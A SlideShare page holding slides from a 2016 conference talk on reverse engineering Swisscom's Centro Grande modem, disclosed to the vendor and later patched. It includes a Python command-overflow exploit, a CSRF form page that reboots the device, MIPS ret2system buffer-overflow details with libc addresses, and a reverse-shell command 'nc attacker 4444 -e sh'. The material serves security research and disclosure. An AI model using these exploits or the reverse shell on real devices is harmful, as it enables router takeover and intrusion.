SlideShare a Scribd company logo

Reverse engineering Swisscom's Centro Grande Modem

Cyber Security Alliance
Cyber Security Alliance

Alain Mowat & Thomas Imbert, Cyber Security Conference 2016

Software
1 of 38
Download to read offline
Reverse engineering Swisscom’sReverse engineering Swisscom’s Centro Grande modemsCentro Grande modems Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert
2whoami › Alain Mowat (@plopz0r) › Head of Audit division at SCRT › Pentest › Code review › Trainings › Mostly a Web App guy › Member of 0daysober CTF team › Watch other people exploiting cool vulns
3Background › Why look into the Swisscom modems? › Why this talk? › I don’t actually own a Swisscom modem › Made it a bit harder to study...
4Attack Surface › ADB# show netstat tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:9090 0.0.0.0:* udp 0 0 127.0.0.1:15000 0.0.0.0:* udp 0 0 0.0.0.0:53 0.0.0.0:* udp 0 0 0.0.0.0:323 0.0.0.0:* udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* udp 0 0 178.199.180.148:5060 0.0.0.0:* udp 0 0 192.168.1.1:5351 0.0.0.0:* udp 0 0 0.0.0.0:1900 0.0.0.0:* udp 0 0 192.168.1.1:47863 0.0.0.0:* udp 0 0 0.0.0.0:123 0.0.0.0:* udp 0 0 ff02::1:2:547 :::* udp 0 0 :::53 :::* udp 0 0 :::323 :::* udp 0 0 :::123 :::* raw 0 0 0.0.0.0:2 0.0.0.0:* 2 raw 0 0 0.0.0.0:6 0.0.0.0:* 6 raw 0 0 :::58 :::*
5Attack Surface › ADB# show processes 256 0 2040 S logd 259 0 1308 S klogd -c3 271 0 832 S ec 343 0 3236 S cm 350 0 0 SW [dsl0] 363 0 0 SW [bcmsw] 364 0 0 SW [bcmsw_timer] 365 0 0 SW< [linkwatch] 5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168 6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300 6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf 7362 0 1000 S dhcps /tmp/dhcps.conf 7910 0 764 S dns 8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4 8026 0 736 S /bin/wpspbc 8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf 9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot 9177 0 2940 S cwmp 9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh 9353 0 884 S ec 9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300 11846 0 1332 S /bin/sh DHCPv4Client.sh 11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C 14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p 15287 0 3576 S voip 15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro 15923 0 1056 S N chronyd -f /tmp/chrony.conf 16770 0 820 S radvd 16812 0 2036 S dibbler-server start
6Finding the firmware › Locate the firmware › https://www.swisscom.ch/en/residential/help/device/internet-router/centro- grande.html › Vx226x1_61400.sig › Version at the time › 6.14.00
7Extracting the firmware › Binwalk (https://github.com/devttys0/binwalk) › Firmware modification kit › ./extract-firmware.sh
8CPE WAN Management Protocol › Also known as TR-069 › Protocol that defines how to manage « Customer-premises Equipment » › cwmp binary › Listens to 0.0.0.0:7547 › iptables rule allows access only from certain Swisscom subnets
9Web interface › Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html) › If a binary file is accessed through the web interface, it executes it › Directory traversal → Code Exec in version 1.9.3
10Web interface › Mostly managed by a CGI called ui
11Emulating the device › OpenWRT (https://openwrt.org/) › Linux distribution for embedded devices › Qemu (http://wiki.qemu.org/Main_Page) › Machine emulator and virtualizer
12Configuring OpenWRT › make menuconfig › MIPS target › Add all debugging and networking tools › Cross-compile nhttpd › Generate ramdisk › Copy Swisscom firmware files to the image › Run image with qemu › qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini- tramfs.elf -net tap -net nic -nographic -m 2048
13Setting up the image › nhttpd server serverroot /www serveradmin webmaster@adbglobal.com servermimes conf/mimes docroot /www/htdocs docindex lanhosts logpid /tmp/logs user nobody disablehttp 0 notfound 501 sslport 443 sslcert /etc/certs/server.crt sslcertkey /etc/certs/server.key sslcertca /etc/certs/ca.pem sslcertreq * serverlisten 0.0.0.0 servername localhost
14Web interface
15YAPL ?
16Web request overview nhttpd swc_login.yapl swc_common.yapl swc_firewall.yapl ... ui cm POST /ui/swc/login Environment setup Configuration command Get corresponding YAPL « script »
17Configuration manager › Used to view and modify the device’s configuration › Bound to localhost:9034 › Also /tmp/cmctl socket › Several possible commands › GETO, GETV, … › SET, SETM, … › RESET, REBOOT, ... › DUMP, EXPORT, ...
18Mandatory IDA graph
19Configuration manager › Main loop listen on localhost port 9034 socket = accept while 1: input = socket.recv(16384) handleRequest(input) def handleRequest(input): type = validateRequestType(input) params = validateRequestParams(input) callTypeHandler(params)
20Configuration Manager
21Finalizing the image setup udhcpc -i br-lan cm touch /tmp/cmctl chmod 777 /tmp/cmctl nhttpd -c /www/nhttpd.cfg nc localhost 9034 DOM Device /etc/cm/tr181/dom/ DOM InternetGatewayDevice /etc/cm/tr098/dom/ CONF /etc/cm/conf/ ADD InternetGatewayDevice.WANDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1 SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1 SET Device.IP.Interface.1.Status Up SET Device.Ethernet.Link.1.Name br-lan SET Device.DeviceInfo.SerialNumber 123456 SET Device.IP.Interface.1.X_ADB_Upstream true SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
22Running image
23Configuration manager › Special syntax › Similar to SQL in certain ways › SELECT =~ GETV › UPDATE =~ SET › Conditions › GETO A.B.C.[Test=1] › GETO A.B.C.[Test~1] › GETO A.B.C.[Test!1]
24Vulnerability #1 : Command overflow › Each call to recv is treated as a new command › By sending more than 16384 characters, we can craft a new configuration command › Logging in to the web interface generates a call to the configuration manager that looks like this › GETO Users.User.[Username=ATTACKER_CONTROLLED] › By providing a long username, we can exceed the 16348 limit and gene- rate a new request within the configuration manager › Allows complete control over the device › Change passwords › Allow remote access › ...
25Vulnerability #1 : Command overflow ui cm GETO Users.User.[Username=A AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA […] AAAAAAAAAAAAAAAAAAAAAAAAAAA REBOOTn recv(16384) recv(16384) send process(‘GETO Users……’) process(‘REBOOT’)
26Exploit #1 : Command overflow from requests import post payload = dict() payload['userName'] = ( 16358 ) * 'a' + 'REBOOT' + 'n' payload['userPwd'] = 'a' payload['login'] = 'Login' payload['language'] = '' while 1: r = post('http://192.168.1.1/ui/swc/login/index', data=payload) D EM O
27Vulnerability #2 : Login CSRF › Use CSRF to exploit someone else’s device <html> <body> <form method="POST" action="http://192.168.1.1/ui/swc/login/index"> <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/> <input type="hidden" name="userPwd" value="a"/> <input type="hidden" name="login" value="login"/> <input type="hidden" name="language" value=""/> </form> <script> document.forms[0].submit(); </script> </body> </html>
28Exposed web interfaces – Centro Business
29Vulnerability #3 : Buffer overflow(s) › Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …) › Requirements › Arbitrarily-named XML file on the device › file and folder are both limited to 4096 in size parseFilesinFolder(folder): char path[4096]; files = scandir(folder) for file in files: if file ends with ".xml": strncat(path,folder,4096) strncat(path,file,4096) parseFile(filename)
30Exploit #3 : Creating the XML file › The PATHSAVE command takes 2 arguments › An XML filename › Property that needs to be saved › PATHSAVE /tmp/test.xml Users.User.1.Password › Can use this to write an arbitrarily-named file on the device › Exploit can then be triggered by prepending folder with lots of / › CONF /////////////////////////////////////[…]/tmp/exploit.xml
31Exploit #3 : Exploiting a MIPS binary Prologue Epilogue
32Exploit #3 : Exploiting a MIPS binary › No ASLR on the device › No NX › No canaries › A version of nc with the -e switch is present on the device › Try to call system(‘nc attacker 4444 -e sh’) › Arguments are not passed on the stack though, but in registers › $a0 › $a1 › …
33Exploit #3 : ret2system › Quick analysis gives address of system in libUclibc (Centro business) : › Libuclibc base : 0x2aaf8000 › System is at offset : 0x54610 › Real address : 0x2ab4c610 › Need a gadget in order to get our argument to system in $a0 › Make $a0 point to address in the stack › $s0 is also under our control
34Exploit #3 : ret2system /tmp/aaaaaaaaaaaaaaaax2axb4xc6x10bbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbx2axb1xcaxacaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot; #bbbb.xml $ra → gadget $s0 → system command 64 * ‘a’ (addiu $a0,$sp,64)
35Exploit #3 : Full exploit D EM O
36Disclosure timeline › 9 September 2015 : Initial disclosure to Swisscom › 10 September 2015 : Vulnerabilities acknowledged by Swisscom › 11 September 2015 : Vendor notified (ADB) › 18 September 2015 : Confirmation of vulns & quick fix available › 24 September 2015 : Test of quick fix › 29 September 2015 : Contact with ADB › October 2015 : Rollout of quick fix to all devices › January 2016 : Status full fix : › Centro grande : 100 % › Centro Business 1.0 : 50 % › Centro Business 2.0 : 100 % › 13 June 2016 : Disclure
37Swisscom bounty › Combination of flaws rewarded with 3’000 CHF › Donated to the Ligue Vaudoise contre le Cancer › Swisscom Bug Bounty program is up & running › Talk is tomorrow afternoon :)
38Conclusions › Attackers › Look into other processes on the modem › miniupnp › voip › Embedded devices are found everywhere nowadays › Huge attack surface › Less people reversing firmwares than searching for XSS › Defenders › Consider 0days in your penetration tests › Test your defense in depth › Test your ability to detect breaches

Recommended

Building microservices on azure
Building microservices on azureBuilding microservices on azure
Building microservices on azure
Vaibhav Gujral
 
Network virtualization
Network virtualizationNetwork virtualization
Network virtualization
Damian Parniewicz
 
Ekon25 mORMot 2 Server-Side Notifications
Ekon25 mORMot 2 Server-Side NotificationsEkon25 mORMot 2 Server-Side Notifications
Ekon25 mORMot 2 Server-Side Notifications
Arnaud Bouchez
 
Percona Live 2012PPT: MySQL Query optimization
Percona Live 2012PPT: MySQL Query optimizationPercona Live 2012PPT: MySQL Query optimization
Percona Live 2012PPT: MySQL Query optimization
mysqlops
 
LLVM Instruction Selection
LLVM Instruction SelectionLLVM Instruction Selection
LLVM Instruction Selection
Shiva Chen
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
Brendan Gregg
 
Database Replication
Database ReplicationDatabase Replication
Database Replication
Vatroslav Mileusnić
 
Distributed & parallel system
Distributed & parallel systemDistributed & parallel system
Distributed & parallel system
Manish Singh
 

Recommended

Building microservices on azure
Building microservices on azureBuilding microservices on azure
Building microservices on azure
Vaibhav Gujral
 
Network virtualization
Network virtualizationNetwork virtualization
Network virtualization
Damian Parniewicz
 
Ekon25 mORMot 2 Server-Side Notifications
Ekon25 mORMot 2 Server-Side NotificationsEkon25 mORMot 2 Server-Side Notifications
Ekon25 mORMot 2 Server-Side Notifications
Arnaud Bouchez
 
Percona Live 2012PPT: MySQL Query optimization
Percona Live 2012PPT: MySQL Query optimizationPercona Live 2012PPT: MySQL Query optimization
Percona Live 2012PPT: MySQL Query optimization
mysqlops
 
LLVM Instruction Selection
LLVM Instruction SelectionLLVM Instruction Selection
LLVM Instruction Selection
Shiva Chen
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
Brendan Gregg
 
Database Replication
Database ReplicationDatabase Replication
Database Replication
Vatroslav Mileusnić
 
Distributed & parallel system
Distributed & parallel systemDistributed & parallel system
Distributed & parallel system
Manish Singh
 
Distributed Server
Distributed ServerDistributed Server
Distributed Server
Rajan Kumar
 
CS9222 ADVANCED OPERATING SYSTEMS
CS9222 ADVANCED OPERATING SYSTEMSCS9222 ADVANCED OPERATING SYSTEMS
CS9222 ADVANCED OPERATING SYSTEMS
Kathirvel Ayyaswamy
 
Message queues
Message queuesMessage queues
Message queues
Max Bodnar
 
Advanced backup methods (Postgres@CERN)
Advanced backup methods (Postgres@CERN)Advanced backup methods (Postgres@CERN)
Advanced backup methods (Postgres@CERN)
Anastasia Lubennikova
 
Contemporary Linux Networking
Contemporary Linux NetworkingContemporary Linux Networking
Contemporary Linux Networking
Maximilan Wilhelm
 
Load balancing
Load balancingLoad balancing
Load balancing
ankur bhalla
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
Stormpath
 
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB
 
App armor structure
App armor structureApp armor structure
App armor structure
Longbeo Longnhat
 
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
The Linux Foundation
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Fault tolerance
Fault toleranceFault tolerance
Fault tolerance
Lekashri Subramanian
 
Introduction to Parallel and Distributed Computing
Introduction to Parallel and Distributed ComputingIntroduction to Parallel and Distributed Computing
Introduction to Parallel and Distributed Computing
Sayed Chhattan Shah
 
Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)
Sri Prasanna
 
Mobageの技術を体験(MyDNS編)
Mobageの技術を体験(MyDNS編)Mobageの技術を体験(MyDNS編)
Mobageの技術を体験(MyDNS編)
Daisuke Ikeda
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
Georg Schönberger
 
TRex Traffic Generator - Hanoch Haim
TRex Traffic Generator - Hanoch HaimTRex Traffic Generator - Hanoch Haim
TRex Traffic Generator - Hanoch Haim
harryvanhaaren
 
Galera Cluster Best Practices for DBA's and DevOps Part 1
Galera Cluster Best Practices for DBA's and DevOps Part 1Galera Cluster Best Practices for DBA's and DevOps Part 1
Galera Cluster Best Practices for DBA's and DevOps Part 1
Codership Oy - Creators of Galera Cluster
 
[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical
Moabi.com
 
Fun with Network Interfaces
Fun with Network InterfacesFun with Network Interfaces
Fun with Network Interfaces
Kernel TLV
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
Cyber Security Alliance
 
Introduction to HTML5+CSS
Introduction to HTML5+CSSIntroduction to HTML5+CSS
Introduction to HTML5+CSS
Ramses Cabello
 

More Related Content

What's hot

Distributed Server
Distributed ServerDistributed Server
Distributed Server
Rajan Kumar
 
Contemporary Linux Networking
Contemporary Linux NetworkingContemporary Linux Networking
Contemporary Linux Networking
Maximilan Wilhelm
 
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
The Linux Foundation
 
Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)
Sri Prasanna
 
[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical
Moabi.com
 
Fun with Network Interfaces
Fun with Network InterfacesFun with Network Interfaces
Fun with Network Interfaces
Kernel TLV
 

What's hot (20)

Distributed Server
Distributed ServerDistributed Server
Distributed Server
 
CS9222 ADVANCED OPERATING SYSTEMS
CS9222 ADVANCED OPERATING SYSTEMSCS9222 ADVANCED OPERATING SYSTEMS
CS9222 ADVANCED OPERATING SYSTEMS
 
Message queues
Message queuesMessage queues
Message queues
 
Advanced backup methods (Postgres@CERN)
Advanced backup methods (Postgres@CERN)Advanced backup methods (Postgres@CERN)
Advanced backup methods (Postgres@CERN)
 
Contemporary Linux Networking
Contemporary Linux NetworkingContemporary Linux Networking
Contemporary Linux Networking
 
Load balancing
Load balancingLoad balancing
Load balancing
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
MongoDB World 2019: MongoDB Read Isolation: Making Your Reads Clean, Committe...
 
App armor structure
App armor structureApp armor structure
App armor structure
 
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
XPDDS17: Reworking the ARM GIC Emulation & Xen Challenges in the ARM ITS Emu...
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 
Fault tolerance
Fault toleranceFault tolerance
Fault tolerance
 
Introduction to Parallel and Distributed Computing
Introduction to Parallel and Distributed ComputingIntroduction to Parallel and Distributed Computing
Introduction to Parallel and Distributed Computing
 
Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)Logical Clocks (Distributed computing)
Logical Clocks (Distributed computing)
 
Mobageの技術を体験(MyDNS編)
Mobageの技術を体験(MyDNS編)Mobageの技術を体験(MyDNS編)
Mobageの技術を体験(MyDNS編)
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
 
TRex Traffic Generator - Hanoch Haim
TRex Traffic Generator - Hanoch HaimTRex Traffic Generator - Hanoch Haim
TRex Traffic Generator - Hanoch Haim
 
Galera Cluster Best Practices for DBA's and DevOps Part 1
Galera Cluster Best Practices for DBA's and DevOps Part 1Galera Cluster Best Practices for DBA's and DevOps Part 1
Galera Cluster Best Practices for DBA's and DevOps Part 1
 
[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical[Defcon] Hardware backdooring is practical
[Defcon] Hardware backdooring is practical
 
Fun with Network Interfaces
Fun with Network InterfacesFun with Network Interfaces
Fun with Network Interfaces
 

Viewers also liked

3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
SlideTeam.net
 
ציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחר
hachamd
 
домашние любимцы
домашние любимцыдомашние любимцы
домашние любимцы
Orlovatania
 
SharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudSharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the Cloud
Dan Usher
 

Viewers also liked (20)

Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Introduction to HTML5+CSS
Introduction to HTML5+CSSIntroduction to HTML5+CSS
Introduction to HTML5+CSS
 
The Mall of the World
The Mall of the WorldThe Mall of the World
The Mall of the World
 
BAFC233
BAFC233BAFC233
BAFC233
 
Three tier application
Three tier applicationThree tier application
Three tier application
 
весь-журнал
весь-журналвесь-журнал
весь-журнал
 
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
 
Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013
 
October Newsletter
October NewsletterOctober Newsletter
October Newsletter
 
Adobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly EarningsAdobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly Earnings
 
Aimopp For Presentation
Aimopp For PresentationAimopp For Presentation
Aimopp For Presentation
 
Contract - what roles we do
Contract - what roles we doContract - what roles we do
Contract - what roles we do
 
ציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחר
 
Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1
 
Web Mining e analisi di reti sociali
Web Mining e analisi di reti socialiWeb Mining e analisi di reti sociali
Web Mining e analisi di reti sociali
 
Attractions in the majestic city of Kandy
Attractions in the majestic city of KandyAttractions in the majestic city of Kandy
Attractions in the majestic city of Kandy
 
Guia de estudio mapa
Guia de estudio mapaGuia de estudio mapa
Guia de estudio mapa
 
домашние любимцы
домашние любимцыдомашние любимцы
домашние любимцы
 
SharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudSharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the Cloud
 
Dropbox
Dropbox Dropbox
Dropbox
 

Similar to Reverse engineering Swisscom's Centro Grande Modem

Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
Lex Yu
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornment
Asif
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
Positive Hack Days
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
Ekaterina Melnik
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
Linaro
 
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
Brendan Gregg
 

Similar to Reverse engineering Swisscom's Centro Grande Modem (20)

Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPF
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_Tizen
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Docker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Prague
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
05 module managing your network enviornment
05 module managing your network enviornment05 module managing your network enviornment
05 module managing your network enviornment
 
C&C Botnet Factory
C&C Botnet FactoryC&C Botnet Factory
C&C Botnet Factory
 
Osol Pgsql
Osol PgsqlOsol Pgsql
Osol Pgsql
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Labs_BT_20221017.pptx
Labs_BT_20221017.pptxLabs_BT_20221017.pptx
Labs_BT_20221017.pptx
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
HKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with CoresightHKG18-TR14 - Postmortem Debugging with Coresight
HKG18-TR14 - Postmortem Debugging with Coresight
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
A little systemtap
A little systemtapA little systemtap
A little systemtap
 
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPFUSENIX ATC 2017 Performance Superpowers with Enhanced BPF
USENIX ATC 2017 Performance Superpowers with Enhanced BPF
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick Stack
 

More from Cyber Security Alliance

Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
Cyber Security Alliance
 

More from Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
